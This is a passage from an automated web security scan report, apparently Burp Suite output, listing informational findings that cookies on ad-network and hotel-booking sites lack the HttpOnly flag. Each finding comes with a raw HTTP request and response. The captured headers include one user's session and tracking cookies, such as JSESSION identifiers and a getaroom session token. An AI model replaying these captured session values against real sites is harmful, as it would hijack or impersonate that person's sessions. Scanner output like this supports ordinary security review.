HTTP/1.1
Host: u.openx.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://ad.yieldmanager.com/iframe3?sIBdAD10IABKKqQAAAAAAD9DKAAAAAAAAAD8AQYAAAAAAP8A.wD..4orMwAAAAAAqM80AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABo1BIAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABWlIC2a93RChYjAkZYQYlvVHyaUTyyLANlDidrAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D6511%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D728x90%26_salt%3D31903434%26r%3D0%26s%3D2126909,659e43ce-ed51-11e0-8f45-78e7d1f5b944,1317599467411
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s=ba6bf0b1-8895-45a9-97a1-53f788c412d7; p=1317599466; i=d2a43928-76cd-49ea-b899-b41fb371435f

Response

HTTP/1.1 302 Moved Temporarily
Set-Cookie: i=2b443041-40a6-4c68-9457-0c205483d61d; Version=1; Expires=Mon, 01 Oct 2012 23:54:13 GMT; Max-Age=31536000; Domain=.openx.net; Path=/
Server: MochiWeb/1.1 WebMachine/1.8.1 (participate in the frantic)
P3P: CP="CUR ADM OUR NOR STA NID"
Location: http://psa-d.openx.com/w/1.0/ajs?auid=34591&res=1920x1200x16&plg=swf,sl,qt,wmp,shk&ch=ISO-8859-1&tz=300&r=http%3A//ad.yieldmanager.com/clk%3F3%2CeAGljN9ugjAUxp-GO9L0n1hDdlHWmRCtmwkbwRuDbR2KUKwsEp9-zTC8wE5Ozvl9J9.5EIlNSYlmlEREQ4YPixgRrOZQzZhiIYzjmEA8R5hG4S1NNBcIpjxZra5b.ldiIVYj-SkY3xaj-mAc3AUA1Dp5H09XyeBk.RckFiXpM8Hv7xFrpOTwSJMpWhToPf-EEm8u6.yr3mRvvcyWF.kK6e68RetM0V2ma5kXqDjXcDM98pcwrPq-CwgP8NK3Br0rtRmA7Uw7AGUbfyyPDnSVNy2dOTpzqwIiKAxw9LCtOWmvohlCXquD51N7M67fu7LVttm3P83BuH1lnPGGi1Xe8QtnK3Hf%2C&url=http%3A//ad.yieldmanager.com/iframe3%3FsIBdAD10IABKKqQAAAAAAD9DKAAAAAAAAAD8AQYAAAAAAP8A.wD..4orMwAAAAAAqM80AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABo1BIAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABWlIC2a93RChYjAkZYQYlvVHyaUTyyLANlDidrAAAAAA%3D%3D%2C%2Chttp%253A%252F%252Fd.tradex.openx.com%252Fafr.php%253Frefresh%253D40%2526zoneid%253D6511%2526cb%253Dinsert_random_number_here%2526loc%253D%2CB%253D10%2526Z%253D728x90%2526_salt%253D31903434%2526r%253D0%2526s%253D2126909%2C659e43ce-ed51-11e0-8f45-78e7d1f5b944%2C1317599467411&ref=http%3A//ad.yieldmanager.com/st%3Fad_type%3Diframe%26ad_size%3D728x90%26section%3D2126909&cb=53152720326&cc=1&mi=2b443041-40a6-4c68-9457-0c205483d61d&mn=0&mc=1
Date: Sun, 02 Oct 2011 23:54:13 GMT
Content-Length: 0
Connection: close


14.225. http://user.lucidmedia.com/clicksense/user

Summary

Severity:   Information
Confidence:   Certain
Host:   http://user.lucidmedia.com
Path:   /clicksense/user

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /clicksense/user?p=a371b4911c4e5b09&r=1 HTTP/1.1
Host: user.lucidmedia.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ads.pubmatic.com/AdServer/js/syncuppixels.html?p=26071&s=26072
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 2=38yalGDMfLj

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Cache-control: no-cache, no-store
Pragma: no-cache
Date: Mon, 03 Oct 2011 00:14:34 GMT
Expires: Mon, 03 Oct 2011 00:14:34 GMT
P3P: CP="NOI ADM DEV CUR"
X-Handled-By: awserh24/127.0.0.1
Set-Cookie: 2=38yalGDMfLj; Domain=.lucidmedia.com; Expires=Tue, 02-Oct-2012 00:14:34 GMT; Path=/
Location: http://image2.pubmatic.com/AdServer/Pug?vcode=bz0yJnR5cGU9MSZjb2RlPTc2JnRsPTQzMjAw&piggybackCookie=uid:3620501663059719663
Content-Length: 0
Connection: close


14.226. http://uxm.thousandeyes.com/rest/json

Summary

Severity:   Information
Confidence:   Certain
Host:   http://uxm.thousandeyes.com
Path:   /rest/json

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rest/json?data={%22aid%22:%2211%22,%22sid%22:%22D5E8C261-B1E7-4A8B-AEEE-A8B3463F3408%22,%22r%22:265892,%22si%22:1,%22url%22:%22http://www.agoda.com/%22,%22ua%22:%22Mozilla/5.0%20(Windows%20NT%206.1;%20WOW64)%20AppleWebKit/535.1%20(KHTML,%20like%20Gecko)%20Chrome/14.0.835.187%20Safari/535.1%22,%22dlt%22:10244,%22clt%22:29183,%22dcl%22:37693,%22lt%22:37694,%22nt%22:0,%22rc%22:0,%22ft%22:2013,%22dt%22:0,%22ct%22:0,%22sct%22:null,%22rqt%22:2006,%22rpt%22:2,%22let%22:1,%22nl%22:1886} HTTP/1.1
Host: uxm.thousandeyes.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.agoda.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:40:45 GMT
Server: Apache/2.2.14 (Ubuntu)
P3P: policyref='/p3p/p3p.xml', CP='NOI NID HISa OTPa OUR UNRa BUS COM NAV'
Set-Cookie: _uxm_cid=D5E8C261-B1E7-4A8B-AEEE-A8B3463F3408; Domain=.thousandeyes.com; Expires=Tue, 02-Oct-2012 00:40:45 GMT
Vary: Accept-Encoding
Content-Length: 2
Content-Type: text/html

OK

14.227. http://vitamine.networldmedia.net/bts/generic14.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vitamine.networldmedia.net
Path:   /bts/generic14.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /bts/generic14.php?cname=nwmhotwire&cvalue=hotelsearch HTTP/1.1
Host: vitamine.networldmedia.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/results.jsp?searchTokenId=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:41:30 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.9
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR LAW ADM DEV PSA PSD HIS OUR IND UNI"
Set-Cookie: nwmhotwire=hotelsearch; expires=Wed, 02-Nov-2011 00:41:30 GMT; path=/; domain=networldmedia.net
Vary: Accept-Encoding,User-Agent
Content-Length: 43
X-Cnection: close
Content-Type: image/gif

GIF89a.............!.......,...........D..;

14.228. http://www.agoda.com/partners/partnersearch.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.agoda.com
Path:   /partners/partnersearch.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /partners/partnersearch.aspx?CkInDay=09&CkInMonth=10&CkInYear=2011&CkOutDay=16&CkOutMonth=10&CkOutYear=2011&NumberOfRooms=1&NumberOfAdults=1&NumberOfChildren=0&CityName=&CID=1444075 HTTP/1.1
Host: www.agoda.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.trip.com/hotels.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Content-Type: text/html; charset=utf-8
Location: /
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: agoda.version.02=CookieId=7523af68-b979-4a5c-9566-6cdf92488e9a&AllocId=7e8ed96e55a1afa44758a9a3548685a805d33aa9e52f062bd12dd4c14f0443858201818dc947029deb77f5ece1dfdd8b53ce5b4bcaab65f1374e65c5c00ce5341e3516961f3b6a770dff9a5728226b6f70b9ec62c57523af68b979a5c5666cdf92488e9a&TItems=2$1444075$10-03-2011 07:38$10-02-2012 07:38$; domain=agoda.com; expires=Wed, 03-Oct-2012 00:38:09 GMT; path=/
Date: Mon, 03 Oct 2011 00:38:08 GMT
Content-Length: 118
Cache-Control: no-cache, no-store, must-revalidate, proxy-revalidate

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="/">here</a>.</h2>
</body></html>

14.229. http://www.burstnet.com/cgi-bin/ads/ad22156a.cgi/v=2.3S/sz=300x250A/NZ/9460/NF/RETURN-CODE/JS/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.burstnet.com
Path:   /cgi-bin/ads/ad22156a.cgi/v=2.3S/sz=300x250A/NZ/9460/NF/RETURN-CODE/JS/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /cgi-bin/ads/ad22156a.cgi/v=2.3S/sz=300x250A/NZ/9460/NF/RETURN-CODE/JS/ HTTP/1.1
Host: www.burstnet.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.goal.com/en/news/9/england/2011/10/01/2691360/anderson-confident-manchester-united-will-keep-unbeaten-run
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BOO=opt-out

Response

HTTP/1.1 200 OK
Server: Apache (Unix)
P3P: policyref="http://www.burstnet.com/w3c/p3p.xml", CP="NOI DSP LAW PSAa PSDa OUR IND UNI COM NAV STA"
Ad-Reach: Burst!Media
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/html
Vary: Accept-Encoding
Content-Length: 248
Date: Sun, 02 Oct 2011 23:58:59 GMT
Connection: close
Set-Cookie: TID=1; path=/; expires=Mon, 04-Jul-2011 23:58:58 GMT; domain=.burstnet.com
Set-Cookie: /ad22156.11567=,CFC,GFC; path=/
Set-Cookie: TData=1; path=/; expires=Mon, 04-Jul-2011 23:58:58 GMT; domain=.burstnet.com
Set-Cookie: CMS=1; path=/; expires=Mon, 04-Jul-2011 23:58:58 GMT; domain=.burstnet.com
Set-Cookie: CMP=1; path=/; expires=Mon, 04-Jul-2011 23:58:58 GMT; domain=.burstnet.com
Set-Cookie: __qca=1; path=/; expires=Mon, 04-Jul-2011 23:58:58 GMT; domain=.burstnet.com
Set-Cookie: /PC=0; path=/; expires=Sun, 09-Oct-2011 23:58:58 GMT
Set-Cookie: /SC=0-2vc.1; path=/


<!--
var cb = Math.random();
var d = document;
d.write('<script language="JavaScript" type="text/javascript"');
d.write('src="http://optimized-by.rubiconproject.com/a/7743/12359/21900-15.js?cb=
...[SNIP]...

14.230. http://www.cheaptickets.com/shop/hotelsearch

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cheaptickets.com
Path:   /shop/hotelsearch

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /shop/hotelsearch?type=hotel&hotel.keyword.key=bos&hotel.rooms[0].adlts=1&hotel.type=keyword&hotel.chkin=10/09/11&hotel.chkout=10/16/11&search=Search&DCSext.mc_kw=&WT.mc_ev=click&WT.mc_id=c_trip_hot&gcid=C16036x354&lpid=plhot HTTP/1.1
Host: www.cheaptickets.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.trip.com/hotels.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anon=7567558764917771317602252; NSC_xxx.difbqujdlfut.dpn.80_gxe=ffffffff09e3887845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: curr=USD; Expires=Sat, 21-Oct-2079 03:52:52 GMT; Path=/
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
P3P: CP="IND NON DSP UNI COM INT STA CUR PSAo PSDo IVAo IVDo OUR"
Pragma: no-cache
Cache-Control: no-store
Set-Cookie: MKTG=ABCDEFGHU0VNfEMxNjAzNngzNTR8IHwxMzE3NjAyMzI1NzUwfEMxNjAzNngzNTR8fDEwLzAyLzIwMTEgMTk6Mzg6NDUgUE18IHwg; Domain=cheaptickets.com; Expires=Wed, 02-Nov-2011 00:38:45 GMT; Path=/
Set-Cookie: dpc=HOTEL%7C2.2%7C%7Cbos%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-10-09%7C2011-10-16%7C%7C+%7C%26%26HE; Expires=Fri, 02-Dec-2011 00:38:45 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 03 Oct 2011 00:38:45 GMT
Content-Length: 432985


...[SNIP]...

14.231. http://www.expedia.com/Hotel-Search

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.expedia.com
Path:   /Hotel-Search

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /Hotel-Search?olacid=US.BD.IGOUGO-US.HOTEL.HOTEL& HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
Content-Length: 1104
Cache-Control: max-age=0
Origin: http://www.expedia.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.expedia.com/pubspec/scripts/eap.asp?OLACID=US.BD.IGOUGO-US.HOTEL.HOTEL&GOTO=HotSearch&CityName=Boston,United%20States&InDate=10/04/2011&OutDate=10/07/2011&NumAdults=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: p1=`tpid=v.1,1`11; MC1=GUID=CCF4A420AF8B480F8413EFB42E880287; COOKIECHECK=1

action=hotelPackageWizard%40searchHotelOnly&packageType=HOTEL_ONLY&hotelPackageWizard_hotelPackageWizardControl_inpPackageType=HOTEL_ONLY&hotelPackageWizard_hotelPackageWizardControl_hotelWidgetContro
...[SNIP]...

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Date: Mon, 03 Oct 2011 00:10:26 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: iEAPID=00000,; Domain=.expedia.com; Path=/
Set-Cookie: ipsnf3_ext=; Domain=.expedia.com; Expires=Sun, 03-Oct-2010 00:10:25 GMT; Path=/
Set-Cookie: ipsnf3_ext=; Domain=.expedia.com; Expires=Sun, 03-Oct-2010 00:10:25 GMT; Path=/
Content-Length: 589661

<!DOCTYPE html><DIV ID="interstitialServerPush1" style="display:block">

<!--Table here is required so that we can center the page in all displays-->
<table class="basicInterstialWidget" border="0
...[SNIP]...

14.232. http://www.expedia.com/TripPreferences

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.expedia.com
Path:   /TripPreferences

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /TripPreferences?tripid=ddb62d72-d4e4-48fc-9bbf-b63a310bc860&c=1fd513e4-34cd-4ab1-989a-2d21d0c48818 HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.expedia.com/Hotel-Search?olacid=US.BD.ORBITZ.HOTEL.HOTEL&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=CCF4A420AF8B480F8413EFB42E880287; U9Z5=0; s_vi=[CS]v1|27447EB905149286-6000018C4001272D[CE]; COOKIECHECK=1; lsrc=v.1,10/16/2011; MediaCookie=0`1034,1004,PDEST,BOS; iEAPID=21187; aspp=v.1,0|TRIPA.Expedia_US-H_B4.11893.T|||||||||ICM|20111101|; aspp=v.1,0|TRIPA.Expedia_US-H_B4.11893.T|||||||||ICM|20111101|; bn_u=7520316067152911274; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; JSESSION=1cf0d0d6-5e6f-4aff-9a37-f908a92430be; s1=`EAPName=TripAdvisor`EAPBrandingFeature=0`user=v.8,0,EX010F7C6DCC$F1$88001000$D6$5C37n$BE$C6$0En$BE$C6$0En$BE$C6$0E1000$11000$1E81!90$BB$B4$8E$8Ah$14l$AD!i02000`EAPIsVisible=0`EAPIndustry=Other`MH=21187`EAPBrandingURL=`218; p1=`accttype=v.2,8,1,EX012A48FECC$9B$B1KB$F2$A4$FBL$F2$BC$FC$2B$95$FF$9B$90z$9Ds$C2$E1$82$EB!2$E3$AC$37I$8DW$85$AA$BDM`minfo=v.5,EX01B7A7E781$9B$B1KB$EF$A4$FBJ$F2$A0$FC$25$96$FF$9A$90l$9Ds$C4$E1$82$EF$E3$EB$AC$37E$8DW$8B$9C$BDM$29q$E3$9A$13$CDO$15$A4$F7$5C$FE$EBEn$0E$83.$B6$FD$ED$9E$A4$E4$C16$86k$EF`tpid=v.1,1`linfo=v.4,Guest|0|0|255|1|0||Guest|User|Guest|User|Guest S User|247905900|1033|0|0||0|0|0|-1|-1`404

Response

HTTP/1.1 301 Moved Permanently
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Location: https://www.expedia.com/TripPreferences?tripid=ddb62d72-d4e4-48fc-9bbf-b63a310bc860&c=1fd513e4-34cd-4ab1-989a-2d21d0c48818&
Content-Type: text/HTML;charset=UTF-8
Content-Length: 0
Date: Mon, 03 Oct 2011 01:07:17 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: iEAPID=00000,; Domain=.expedia.com; Path=/


14.233. http://www.expedia.com/daily/common/mscookie.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.expedia.com
Path:   /daily/common/mscookie.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /daily/common/mscookie.aspx?PDEST=BOS HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.expedia.com/Hotel-Search?olacid=US.BD.IGOUGO-US.HOTEL.HOTEL&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=CCF4A420AF8B480F8413EFB42E880287; COOKIECHECK=1; iEAPID=0000,; lsrc=v.1,10/16/2011; JSESSION=aa0f7acd-9a8d-4dba-a7c4-36d8d1ea2a11; s1=`0; p1=`tpid=v.1,1`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`63; aspp=v.1,0|US.BD.IGOUGO-US.HOTEL.HOTEL|||||||||OLA|20111101|; aspp=v.1,0|US.BD.IGOUGO-US.HOTEL.HOTEL|||||||||OLA|20111101|; U9Z5=CT-1

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Cteonnt-Length: 96
Content-Length: 96
Date: Mon, 03 Oct 2011 00:10:59 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: MediaCookie=0`1034,1004,PDEST,BOS; domain=.expedia.com; expires=Tue, 31-Jan-2012 01:10:59 GMT; path=/


<!--V. 1.8 5/6/2010-->
<html>
<head>
<title></title>

</head>
<body>

</body>
</html>

14.234. http://www.expedia.com/pubspec/scripts/eap.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.expedia.com
Path:   /pubspec/scripts/eap.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pubspec/scripts/eap.asp?GOTO=HotAvail&HotID=894999&InDate=10/14/11&OutDate=10/16/11&NumAdult=2&NumChild=0&eapid=21187-1&ICMCID=TRIPA.Expedia_US-H_B4.11893.T&ICMDTL=MT1110027Z3xeMPeET6itK0Qu1f-JQAAU.894999.HDSSDeE.T.QCI.258705.ch.668.60745.en_US.. HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.tripadvisor.com/SmartDeals-g60745-Boston_Massachusetts-Hotel-Deals.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=CCF4A420AF8B480F8413EFB42E880287; U9Z5=0; s_vi=[CS]v1|27447EB905149286-6000018C4001272D[CE]; bn_u=7520316067152911274; COOKIECHECK=1; iEAPID=0000,; lsrc=v.1,10/16/2011; JSESSION=1cf0d0d6-5e6f-4aff-9a37-f908a92430be; s1=`0; p1=`tpid=v.1,1`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`63; aspp=v.1,0|US.BD.ORBITZ.HOTEL.HOTEL|||||||||OLA|20111101|; aspp=v.1,0|US.BD.ORBITZ.HOTEL.HOTEL|||||||||OLA|20111101|; MediaCookie=0`1034,1004,PDEST,BOS; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 302 Moved Temporarily
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Location: /Hotel.h894999.Hotel-Information?hashTag=roomsAndRates&&chkin=10/14/11&chkout=10/16/11&rm1=a2&icmcid=TRIPA.Expedia_US-H_B4.11893.T&icmdtl=MT1110027Z3xeMPeET6itK0Qu1f-JQAAU.894999.HDSSDeE.T.QCI.258705.ch.668.60745.en_US..&eapid=21187-1
Content-Length: 383
Content-Type: text/html
Cache-Control: private
Date: Mon, 03 Oct 2011 01:02:12 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: p1=`tpid=v.1,1`11; expires=Sun, 2-Oct-2016 00:00:01 GMT; domain=.expedia.com; path=/
Set-Cookie: iEAPID=21187; domain=.expedia.com; path=/
Set-Cookie: s1=`EAPName=TripAdvisor`EAPBrandingFeature=0`EAPIsVisible=0`EAPIndustry=Other`MH=21187`EAPBrandingURL=`99; domain=.expedia.com; path=/
Set-Cookie: s1=`EAPName=TripAdvisor`EAPBrandingFeature=0`EAPIsVisible=0`EAPIndustry=Other`MH=21187`EAPBrandingURL=`99; domain=.expedia.com; path=/
Set-Cookie: s1=`EAPName=TripAdvisor`EAPBrandingFeature=0`EAPIsVisible=0`EAPIndustry=Other`MH=21187`EAPBrandingURL=`99; domain=.expedia.com; path=/
Set-Cookie: s1=`EAPName=TripAdvisor`EAPBrandingFeature=0`EAPIsVisible=0`EAPIndustry=Other`MH=21187`EAPBrandingURL=`99; domain=.expedia.com; path=/
Set-Cookie: s1=`EAPName=TripAdvisor`EAPBrandingFeature=0`EAPIsVisible=0`EAPIndustry=Other`MH=21187`EAPBrandingURL=`99; domain=.expedia.com; path=/
Set-Cookie: s1=`EAPName=TripAdvisor`EAPBrandingFeature=0`EAPIsVisible=0`EAPIndustry=Other`MH=21187`EAPBrandingURL=`99; domain=.expedia.com; path=/

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/Hotel.h894999.Hotel-Information?hashTag=roomsAndRates&amp;&amp;chkin=10/14/11&amp;chkout=10/16/11
...[SNIP]...

14.235. http://www.getaroom.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.getaroom.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.getaroom.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.trip.com/hotels.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: affiliate=032ea00e; show_pu=pageview=0&allowed=true&shown=false; www_session=BAh7CToLc2VhcmNoaQM79eU6D3Nlc3Npb25faWQiJTRmMGJjNjU4OGRkNTY4ZGQwMjcyYjU3Njg0OGRlNmYxIgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewY6C25vdGljZSImUGxlYXNlIGVudGVyIGEgdmFsaWQgZGVzdGluYXRpb24uBjoKQHVzZWR7BjsIRjoTcmVtb3RlX2FkZHJlc3MiEjUwLjIzLjEyMy4xMDY%3D--bc19aecb2a0c7d888b60a967615bd73985c6d315

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Status: 200
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.8
ETag: "f57a77ed77550a00b9eb6450a79c54dc"
P3P: CP="CAO DSP DEVa TAIa OUR BUS UNI NAV STA PRE LOC", policyref="/w3c/p3p.xml"
X-Runtime: 299
Set-Cookie: show_pu=pageview=0&allowed=true&shown=false; path=/
